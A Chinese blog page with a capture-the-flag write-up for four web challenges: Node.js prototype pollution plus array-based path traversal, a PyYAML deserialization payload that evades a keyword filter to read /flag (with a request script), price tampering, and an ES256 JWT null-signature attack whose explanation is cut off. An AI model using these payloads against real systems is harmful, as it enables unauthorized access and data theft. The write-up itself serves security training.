

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://gitee.com/bobrocket/img/raw/master/Snipaste_2025-12-30_21-02-15.png">
  <link rel="icon" href="https://gitee.com/bobrocket/img/raw/master/Snipaste_2025-12-30_21-02-15.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suny">
  <meta name="keywords" content="">
  <meta name="referrer" content="no-referrer">
  
    <meta name="description" content="黄河流域和智警杯时间重了，回来之后复现的 real_Grafana爆破密码然后打CVE 12username:editorpassword:editor123   ezlog主要就是两个接口，一个可以nodejs原型链污染，一个可以查看文件但是需要管理员权限 先看看管理员的校验逻辑 1234567891011const ADMIN_NAME &#x3D; &quot;CTF-ADMIN&quot;;cons">
<meta property="og:type" content="article">
<meta property="og:title" content="第四届黄河流域公安院校网络安全技能挑战赛">
<meta property="og:url" content="https://www.sunynov.top/2026/06/10/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E9%BB%84%E6%B2%B3%E6%B5%81%E5%9F%9F%E5%85%AC%E5%AE%89%E9%99%A2%E6%A0%A1%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E6%8C%91%E6%88%98%E8%B5%9B/index.html">
<meta property="og:site_name" content="suny">
<meta property="og:description" content="黄河流域和智警杯时间重了，回来之后复现的 real_Grafana爆破密码然后打CVE 12username:editorpassword:editor123   ezlog主要就是两个接口，一个可以nodejs原型链污染，一个可以查看文件但是需要管理员权限 先看看管理员的校验逻辑 1234567891011const ADMIN_NAME &#x3D; &quot;CTF-ADMIN&quot;;cons">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260328214027001.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260618113820629.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260618120405228.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260618163942302.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260630220959980.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701113709190.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260701113759419.png">
<meta property="article:published_time" content="2026-06-10T11:29:47.000Z">
<meta property="article:modified_time" content="2026-07-01T03:44:52.512Z">
<meta property="article:author" content="suny">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260328214027001.png">
  
  
  
  <title>第四届黄河流域公安院校网络安全技能挑战赛 - suny</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.sunynov.top","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suny</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="第四届黄河流域公安院校网络安全技能挑战赛"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        suny
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-06-10 19:29" pubdate>
          2026年6月10日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">第四届黄河流域公安院校网络安全技能挑战赛</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年7月1日 中午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <p>黄河流域和智警杯时间重了，回来之后复现的</p>
<h2 id="real-Grafana"><a href="#real-Grafana" class="headerlink" title="real_Grafana"></a>real_Grafana</h2><p>爆破密码然后打CVE</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">username:</span>editor<br><span class="hljs-symbol">password:</span>editor123<br></code></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260328214027001.png" srcset="/img/loading.gif" lazyload alt="image-20260328214027001"></p>
<h2 id="ezlog"><a href="#ezlog" class="headerlink" title="ezlog"></a>ezlog</h2><p>主要就是两个接口，一个可以nodejs原型链污染，一个可以查看文件但是需要管理员权限</p>
<p>先看看管理员的校验逻辑</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python">const ADMIN_NAME = <span class="hljs-string">&quot;CTF-ADMIN&quot;</span>;<br>const ADMIN_NONCE = <span class="hljs-string">&quot;t0mcater&quot;</span> + generateSecureRandomNumber();<br><br>let adminconfig = &#123;<br>    name: ADMIN_NAME<br>&#125;;<br>Object.prototype.nonce = ADMIN_NONCE;<br><br>function isAdmin(name, nonce) &#123;<br>    <span class="hljs-keyword">return</span> name === adminconfig.name &amp;&amp; nonce === Object.prototype.nonce;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>校验了两个变量，再看看递归合并函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs python">function merge(target, source, res) &#123;<br>    <span class="hljs-keyword">for</span> (let key <span class="hljs-keyword">in</span> source) &#123;<br>        <span class="hljs-keyword">if</span> (key === <span class="hljs-string">&#x27;__proto__&#x27;</span>) &#123;<br>            <span class="hljs-keyword">if</span> (res) &#123;<br>                res.send(<span class="hljs-string">&#x27;？？？？&#x27;</span>);<br>                <span class="hljs-keyword">return</span>;<br>            &#125;<br>            <span class="hljs-keyword">continue</span>;<br>        &#125;<br><br>        <span class="hljs-keyword">if</span> (source[key] instanceof Object &amp;&amp; key <span class="hljs-keyword">in</span> target) &#123;<br>            merge(target[key], source[key], res);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            target[key] = source[key];<br>        &#125;<br>    &#125;<br>&#125;<br><br>app.post(<span class="hljs-string">&#x27;/api/pollute&#x27;</span>, (req, res) =&gt; &#123;<br>    let userconfig = req.body;<br>    <span class="hljs-keyword">try</span> &#123;<br>        merge(adminconfig, userconfig, res);<br>        res.json(&#123; <br>            status: <span class="hljs-string">&quot;success&quot;</span>, <br>            msg: <span class="hljs-string">&quot;pollute success!!!&quot;</span>,<br>        &#125;);<br>    &#125; catch (e) &#123;<br>        res.status(<span class="hljs-number">500</span>).json(&#123; status: <span class="hljs-string">&quot;error&quot;</span>, message: <span class="hljs-string">&quot;wtf?&quot;</span> &#125;);<br>    &#125;<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>禁用了<code>__proto__</code>，我们可以走<code>constructor</code>，考虑到是公共靶机，保险起见顺手把name也污染了</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;hacker&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;constructor&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;prototype&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;nonce&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;pwned&quot;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>下面我们看看怎么读文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs python">const allowedFile = (file) =&gt; &#123;<br>    const lastDot = file.lastIndexOf(<span class="hljs-string">&#x27;.&#x27;</span>);<br>    <span class="hljs-keyword">if</span> (lastDot === -<span class="hljs-number">1</span>) <span class="hljs-keyword">return</span> false;<br>    const <span class="hljs-built_in">format</span> = file.<span class="hljs-built_in">slice</span>(lastDot + <span class="hljs-number">1</span>);<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">format</span> == <span class="hljs-string">&#x27;log&#x27;</span>;<br>&#125;;<br><br>app.post(<span class="hljs-string">&#x27;/api/checkfile&#x27;</span>, <span class="hljs-keyword">async</span> (req, res, <span class="hljs-built_in">next</span>) =&gt; &#123;<br>    <span class="hljs-keyword">try</span> &#123;<br>        <span class="hljs-keyword">if</span> (isAdmin(req.body.name, req.body.nonce)) &#123;<br>            let file = req.query.file;<br>            console.log(file);<br>            <span class="hljs-keyword">if</span> (!file) &#123;<br>                <span class="hljs-keyword">return</span> res.send(<span class="hljs-string">&#x27;File name not specified.&#x27;</span>);<br>            &#125;<br>            <span class="hljs-keyword">if</span> (!allowedFile(file)) &#123;<br>                <span class="hljs-keyword">return</span> res.send(<span class="hljs-string">&#x27;File type not allowed.&#x27;</span>);<br>            &#125;<br>            <span class="hljs-keyword">try</span> &#123;<br>                <span class="hljs-keyword">if</span> (file.includes(<span class="hljs-string">&#x27; &#x27;</span>) || file.includes(<span class="hljs-string">&#x27;/&#x27;</span>) || file.includes(<span class="hljs-string">&#x27;..&#x27;</span>)) &#123;<br>                    <span class="hljs-keyword">return</span> res.send(<span class="hljs-string">&#x27;Invalid filename!&#x27;</span>);<br>                &#125;<br>            &#125; catch (err) &#123;<br>                <span class="hljs-keyword">return</span> res.send(<span class="hljs-string">&#x27;An error occured!&#x27;</span>);<br>            &#125;<br><br>            <span class="hljs-keyword">if</span> (file.length &gt; <span class="hljs-number">10</span>) &#123;<br>                file = file.<span class="hljs-built_in">slice</span>(<span class="hljs-number">0</span>, <span class="hljs-number">10</span>);<br>            &#125;<br>            const returned = path.resolve(<span class="hljs-string">&#x27;./&#x27;</span> + file);<br>            fs.readFile(returned, (err) =&gt; &#123;<br>                <span class="hljs-keyword">if</span> (err) &#123;<br>                    <span class="hljs-keyword">return</span> res.send(<span class="hljs-string">&#x27;An error occured!&#x27;</span>);<br>                &#125;<br>                res.sendFile(returned);<br>            &#125;);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-keyword">return</span> res.status(<span class="hljs-number">403</span>).send(<span class="hljs-string">&#x27;Sorry Only privileged Admin can check the file.&#x27;</span>);<br>        &#125;<br>    &#125; catch (err) &#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-built_in">next</span>(err);<br>    &#125;<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>这里校验了文件后缀名，进行了长度截取</p>
<p>注意：file.slice对数组也有效而对file参数进行多次传参可以产生数组！！！</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-keyword">/api/</span>checkfile?<span class="hljs-attr">file</span><span class="hljs-operator">=</span>a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=a<span class="hljs-variable">&amp;file</span>=%<span class="hljs-number">2F</span>..%<span class="hljs-number">2F</span>..%<span class="hljs-number">2F</span>flag<span class="hljs-variable">&amp;file</span>=.<span class="hljs-variable">&amp;file</span>=log<br></code></pre></td></tr></table></figure>

<p>传参得到</p>
<figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;/../../flag</span>&#x27;,<span class="hljs-symbol">&#x27;.</span>&#x27;,<span class="hljs-symbol">&#x27;log</span>&#x27;]<br></code></pre></td></tr></table></figure>

<p>完美通过后缀校验，长度截取直接截掉后缀名</p>
<figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;a</span>&#x27;,<span class="hljs-symbol">&#x27;/../../flag</span>&#x27;]<br></code></pre></td></tr></table></figure>

<p>我们看<code>path.resolve(&#39;./&#39; + file);</code></p>
<p>这里file是一个数组，会进行<code>toString</code>操作，变成<code>./a,a,a,a,a,a,a,a,a,/../../flag</code>，直接目录穿越，读到flag</p>
<h2 id="喵喵宠物医院"><a href="#喵喵宠物医院" class="headerlink" title="喵喵宠物医院"></a>喵喵宠物医院</h2><p>提示YAML不止能写配置文件，PyYAML的文档里有些有意思的tag，那一般就是PyYaml反序列化了</p>
<p>我们探测一下有哪些接口</p>
<p><code>/api/records</code>电子档案增删查，<code>/api/terminal</code>智能辅助终端</p>
<p>继续探测，我们发现在智能辅助终端输入help会暴露两个方法</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260618113820629.png" srcset="/img/loading.gif" lazyload alt="image-20260618113820629"></p>
<p>我们推测这里的<code>yaml.load()</code> 使用了不安全的 Loader</p>
<p>先尝试一个最简单的Payload</p>
<figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl">!!python/object/apply:os.system [<span class="hljs-string">&quot;whoami&quot;</span>]<br></code></pre></td></tr></table></figure>

<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260618120405228.png" srcset="/img/loading.gif" lazyload alt="image-20260618120405228"></p>
<p>有WAF，简单测一下</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mel">!!<span class="hljs-keyword">python</span>,os.<span class="hljs-keyword">popen</span>,os.<span class="hljs-keyword">system</span>,builtins,<span class="hljs-keyword">eval</span>,<span class="hljs-keyword">exec</span>,subprocess,/flag<br></code></pre></td></tr></table></figure>

<p>这里我们来简单解释一下原始payload的构造以及如何绕过WAF</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260618163942302.png" srcset="/img/loading.gif" lazyload alt="image-20260618163942302"></p>
<p>首先是<code>!!python</code>的绕过</p>
<p>YAML 的 <code>%TAG</code> 指令可以为标签 URI 创建别名前缀。利用这一点，将 <code>!!python</code> 映射为自定义前缀 <code>!p!</code></p>
<p>下面是函数，由于WAF常见的执行函数的命令基本都废了，我们找找能打开文件的函数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">linecache.getline(filename, lineno) <span class="hljs-comment">#读取指定文件的指定行</span><br></code></pre></td></tr></table></figure>

<p>那么<code>/flag</code>我们直接用拼接绕过就好了</p>
<p>最终payload：</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">%TAG</span> <span class="hljs-type">!p</span><span class="hljs-string">!</span> <span class="hljs-string">tag:yaml.org,2002:python/</span>           <span class="hljs-comment"># 定义标签简写</span><br><span class="hljs-meta">---</span><br><span class="hljs-attr">name:</span> <span class="hljs-type">!p!object/apply:linecache.getline</span>     <span class="hljs-comment"># 文档开始 + 实际内容</span><br>  <span class="hljs-bullet">-</span> <span class="hljs-type">!p!object/apply:posixpath.join[/,flag]</span><br>  <span class="hljs-bullet">-</span> <span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<h3 id="思考：-和-的作用是什么"><a href="#思考：-和-的作用是什么" class="headerlink" title="思考：---和-的作用是什么"></a>思考：<code>---</code>和<code>-</code>的作用是什么</h3><p><code>---</code>表示yaml文档的开始，前面是标签简写的定义</p>
<p><code>-</code>表示列表，可以给函数传递参数</p>
<p>写一个python程序发包即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>TAG = <span class="hljs-string">&quot;%TAG !p! tag:yaml.org,2002:python/\n---\n&quot;</span><br>PAYLOAD = TAG + <span class="hljs-string">&quot;name: !p!object/apply:linecache.getline\n  - !p!object/apply:posixpath.join [/, flag]&quot;</span><br><br>r = requests.post(<br>    <span class="hljs-string">&#x27;http://175.27.251.122:10003/api/terminal&#x27;</span>,<br>    json=&#123;<span class="hljs-string">&#x27;command&#x27;</span>: PAYLOAD&#125;,<br>    headers=&#123;<span class="hljs-string">&#x27;Connection&#x27;</span>: <span class="hljs-string">&#x27;close&#x27;</span>&#125;,<br>    timeout=(<span class="hljs-number">8</span>, <span class="hljs-number">25</span>)<br>)<br><span class="hljs-built_in">print</span>(r.text)<br></code></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/7518">浅谈PyYAML反序列化漏洞-先知社区</a></p>
<h2 id="川味小厨"><a href="#川味小厨" class="headerlink" title="川味小厨"></a>川味小厨</h2><p>楼下新开了一家川菜馆，点餐系统全面数字化，听说消费大客户有隐藏福利？这个是真的吗？我觉得应该是虚假宣传吧!</p>
<p>注册一个账号，然后余额是0，思考能不能通过负金额购买增加余额</p>
<p>这里支付分为两步，生成订单和支付，分别抓包看一下</p>
<p>创建订单</p>
<figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs nix">POST <span class="hljs-symbol">/api/order/create</span><br><br>&#123;<span class="hljs-string">&quot;items&quot;</span>:<span class="hljs-string">&quot;[&#123;<span class="hljs-char escape_">\&quot;</span>stamp<span class="hljs-char escape_">\&quot;</span>:<span class="hljs-char escape_">\&quot;</span>17828272839110.3505490320695185<span class="hljs-char escape_">\&quot;</span>,<span class="hljs-char escape_">\&quot;</span>id<span class="hljs-char escape_">\&quot;</span>:<span class="hljs-char escape_">\&quot;</span>21<span class="hljs-char escape_">\&quot;</span>,<span class="hljs-char escape_">\&quot;</span>name<span class="hljs-char escape_">\&quot;</span>:<span class="hljs-char escape_">\&quot;</span>芬达<span class="hljs-char escape_">\&quot;</span>,<span class="hljs-char escape_">\&quot;</span>price<span class="hljs-char escape_">\&quot;</span>:2.5,<span class="hljs-char escape_">\&quot;</span>selected<span class="hljs-char escape_">\&quot;</span>:true&#125;,&#123;<span class="hljs-char escape_">\&quot;</span>stamp<span class="hljs-char escape_">\&quot;</span>:<span class="hljs-char escape_">\&quot;</span>17828272863040.0051247505051564834<span class="hljs-char escape_">\&quot;</span>,<span class="hljs-char escape_">\&quot;</span>id<span class="hljs-char escape_">\&quot;</span>:<span class="hljs-char escape_">\&quot;</span>21<span class="hljs-char escape_">\&quot;</span>,<span class="hljs-char escape_">\&quot;</span>name<span class="hljs-char escape_">\&quot;</span>:<span class="hljs-char escape_">\&quot;</span>芬达<span class="hljs-char escape_">\&quot;</span>,<span class="hljs-char escape_">\&quot;</span>price<span class="hljs-char escape_">\&quot;</span>:2.5,<span class="hljs-char escape_">\&quot;</span>selected<span class="hljs-char escape_">\&quot;</span>:true&#125;]&quot;</span>,<span class="hljs-string">&quot;total&quot;</span>:<span class="hljs-number">5</span>&#125;<br></code></pre></td></tr></table></figure>

<p>返回一个orderId</p>
<p>确认支付</p>
<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs axapta">POST /api/<span class="hljs-keyword">order</span>/pay<br><br>&#123;<span class="hljs-string">&quot;orderId&quot;</span>:<span class="hljs-string">&quot;caee86cd-e166-423e-871d-35f5166a54ec&quot;</span>,<span class="hljs-string">&quot;method&quot;</span>:<span class="hljs-string">&quot;微信支付&quot;</span>,<span class="hljs-string">&quot;useCoupon&quot;</span>:<span class="hljs-literal">false</span>&#125;<br></code></pre></td></tr></table></figure>

<p>也就是说只需要改一下总金额获得订单号然后用订单号支付即可</p>
<p>然后进行大额消费，获得vipflag（是假的）</p>
<p>好吧，再来看看其他方向，cookie里面有token看看能不能进行jwt伪造</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260630220959980.png" srcset="/img/loading.gif" lazyload alt="image-20260630220959980"></p>
<p>加密算法是ES256，none和算法混合攻击都不行</p>
<h4 id="补充：-ES256-空签名漏洞"><a href="#补充：-ES256-空签名漏洞" class="headerlink" title="补充： ES256 空签名漏洞"></a>补充： ES256 空签名漏洞</h4><p>JWT 长这样：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">base64url</span><span class="hljs-params">(header)</span></span><span class="hljs-selector-class">.base64url</span>(payload)<span class="hljs-selector-class">.base64url</span>(signature)<br></code></pre></td></tr></table></figure>

<p><code>ES256</code> 是 ECDSA 签名算法。正常情况下，我们没有私钥，不能伪造签名。</p>
<p>但这里服务端使用的 Java ECDSA 验签存在经典问题：某些实现会错误接受 <code>r=0, s=0</code> 的 ECDSA 签名。这个签名的 ASN.1 DER 编码是：</p>
